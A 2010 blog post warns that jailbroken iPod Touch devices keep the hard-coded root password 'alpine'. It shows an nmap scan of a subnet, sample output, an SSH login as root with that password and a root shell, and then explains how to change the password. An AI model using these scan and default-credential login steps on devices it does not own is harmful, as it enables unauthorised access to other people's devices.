iPod Touch Vulnerability after Jailbreak

Posted on January 31st, 2010 by hengdu

As you may know or may not know, there is a vulnerability for iPod Touch after jailbreak. The root password is hard-coded as “alpine”. If your iPod Touch connect to the hotspot network, people who is in the same subnet can do the following:

  1. Nmap the whole subnet.

    2. sudo nmap -A -O -T4 112.55.82.0/24

  2. The scan result will be shown as follows.

    3. Interesting ports on ******* (112.55.82.202):
    PORT STATE SERVICE VERSION
    22/tcp open ssh OpenSSH 5.2 (protocol 2.0)
    62078/tcp open tcpwrapped
    ….
    Running (JUST GUESSING) : Apple embedded (93%), Apple iPhone OS 1.X (89%)

  3. Then, the most likely what the people want to do is:

    4. ssh root@112.55.82.202
    Password: alpine

  4. Then, as you can guess, they want to do whatever they want.

    5. John-Smiths-iPod:/ root# ls
    Applications@  Library/  User@  boot/   dev/  lib/  private/  tmp@  var@
    Developer/     System/   bin/   cores/  etc@  mnt/  sbin/     usr/

The solution is very simple: just to change root password after jailbreak. We can go to terminal application in the iPod.

  • Type su – to enter super user mode
  • Type passwd to enter the new password
  • Type again the new password
  • Type exit. We are done.

Good luck and Thanks,

Tags: Cool Stuff, Linux, Security // Add Comment »

Discussion Area - Leave a Comment




Spam Protection by WP-SpamFree Plugin

« »